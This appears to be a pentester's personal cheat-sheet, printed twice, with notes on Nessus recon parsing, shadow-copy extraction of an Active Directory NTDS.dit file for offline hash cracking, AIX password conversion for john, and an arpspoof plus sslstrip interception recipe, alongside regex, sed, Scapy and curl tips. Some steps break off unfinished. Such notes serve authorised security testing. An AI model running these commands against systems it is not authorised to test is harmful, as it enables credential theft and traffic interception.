ddouhine

## wkhtmltopdf for web info grabing #pentest
#use to speed up recon when targeting large ip ranges
1. scan targets with nessus
2. filter using #10107 plugin
3. save html report
4. extract urls using this:
#extract IP
grep "<H2 style=\"COLOR" nessus_10107.html | awk -F ">" '{print $2}' > col1
#extract ports
grep ")</H2><SPAN class=" nessus_10107.html | awk -F "/" '{print $2}' | awk -F ")" '{print $1}' > col2
#merge IP:ports

## AD domain offline cracking #pentest
Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.

Extract NTDS/SYSTEM from a domain controller:
    net start vss
    vssadmin create shadow /for=c:
    vssadmin list shadows
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp

## Convert IBM-AIX passwd to crack with john #pentest
grep : /etc/security/passwd > pt1; grep passw passwd | awk '{print $3}' > pt2; paste -d' ' pt1 pt2 > pt3; sed -e 's/ //g' pt3 > passwd_w_shadow; rm pt*

## GWT support with webscanners #pentest
GWT support (according to the vendors):
Acunetix
NTOSpider
WebInspect
AppScan
ZAP

Tested:
Burp + Gwtscan.jar: works ~
GWT-Penetration-Testing-Toolset:

## Extended file attributes #nix
setuid	(4000)
---s------		allow owner rights temporarily (eg: mount)
chmod 4755 :
-rwxr-xr-x
-rwsr-xr-x

setgid	(2000)
------s---		allow owner group rights temporarily
chmod 2744 :
-rwxr--r--

## Regex
^ (Caret)        =    match expression at the start of a line, as in ^A.
$ (Question)     =    match expression at the end of a line, as in A$.
\ (Back Slash)   =    turn off the special meaning of the next character, as in \^.
[ ] (Brackets)   =    match any one of the enclosed characters, as in [aeiou].
                      Use Hyphen "-" for a range, as in [0-9].
[^ ]             =    match any one character except those enclosed in [ ], as in [^0-9].
. (Period)       =    match a single character of any value, except end of line.
* (Asterisk)     =    match zero or more of the preceding character or expression.
\{x,y\}          =    match x to y occurrences of the preceding.
\{x\}            =    match exactly x occurrences of the preceding.

## Strings mangling-greping
replace:
sed -e 's/oldtext/newtext/g'

Removing the last three characters from every filename
cat files | sed 's/\(.*\).../\1/'

Removing first character from each filename/string
cat files |sed 's/.\(.*\)/\1/'

Removing last character from each filename/string

## sslstrip #pentest
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listen-port>
./ssltrip.py  -l <listen-port>
arpspoof -i eth0 -t <target_IP> <gateway_IP>

## Scapy
conf
show_interfaces()
conf.iface="eth1"
conf.color_theme=RastaTheme()
load_session("/var/session")
save_session("/var/session")

ls(IP)
a=IP(dst="192.168.0.1")
c=TCP(dport="25")

## Wget-Curl
wget --header "Cookie: chocolate=AKAR6yG2ZFQo5N6I9ONSmygsW0f" --header "User-Agent: Mozilla/4.0" --header "Accept: text/html" -i url.txt -p

write output in a file:
curl http://1.1.1.1 -o output

change UserAgent:
curl -A "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" http://1.1.1.1

http-ntlm auth:
curl --ntlm -u 'DOMAIN\user:passwd' http://1.1.1.1
	#use to speed up recon when targeting large ip ranges
	1. scan targets with nessus
	2. filter using #10107 plugin
	3. save html report
	4. extract urls using this:
	#extract IP
	grep "<H2 style=\"COLOR" nessus_10107.html \| awk -F ">" '{print $2}' > col1
	#extract ports
	grep ")</H2><SPAN class=" nessus_10107.html \| awk -F "/" '{print $2}' \| awk -F ")" '{print $1}' > col2
	#merge IP:ports
	Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
	This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
	The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
	To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.

	Extract NTDS/SYSTEM from a domain controller:
	net start vss
	vssadmin create shadow /for=c:
	vssadmin list shadows
	copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp
	GWT support (according to the vendors):
	Acunetix
	NTOSpider
	WebInspect
	AppScan
	ZAP

	Tested:
	Burp + Gwtscan.jar: works ~
	GWT-Penetration-Testing-Toolset:
	setuid (4000)
	---s------ allow owner rights temporarily (eg: mount)
	chmod 4755 :
	-rwxr-xr-x
	-rwsr-xr-x

	setgid (2000)
	------s--- allow owner group rights temporarily
	chmod 2744 :
	-rwxr--r--
	^ (Caret) = match expression at the start of a line, as in ^A.
	$ (Question) = match expression at the end of a line, as in A$.
	\ (Back Slash) = turn off the special meaning of the next character, as in \^.
	[ ] (Brackets) = match any one of the enclosed characters, as in [aeiou].
	Use Hyphen "-" for a range, as in [0-9].
	[^ ] = match any one character except those enclosed in [ ], as in [^0-9].
	. (Period) = match a single character of any value, except end of line.
	* (Asterisk) = match zero or more of the preceding character or expression.
	\{x,y\} = match x to y occurrences of the preceding.
	\{x\} = match exactly x occurrences of the preceding.
	replace:
	sed -e 's/oldtext/newtext/g'

	Removing the last three characters from every filename
	cat files \| sed 's/\(.*\).../\1/'

	Removing first character from each filename/string
	cat files \|sed 's/.\(.*\)/\1/'

	Removing last character from each filename/string
	echo "1" > /proc/sys/net/ipv4/ip_forward
	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listen-port>
	./ssltrip.py -l <listen-port>
	arpspoof -i eth0 -t <target_IP> <gateway_IP>
	conf
	show_interfaces()
	conf.iface="eth1"
	conf.color_theme=RastaTheme()
	load_session("/var/session")
	save_session("/var/session")

	ls(IP)
	a=IP(dst="192.168.0.1")
	c=TCP(dport="25")
	wget --header "Cookie: chocolate=AKAR6yG2ZFQo5N6I9ONSmygsW0f" --header "User-Agent: Mozilla/4.0" --header "Accept: text/html" -i url.txt -p

	write output in a file:
	curl http://1.1.1.1 -o output

	change UserAgent:
	curl -A "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" http://1.1.1.1

	http-ntlm auth:
	curl --ntlm -u 'DOMAIN\user:passwd' http://1.1.1.1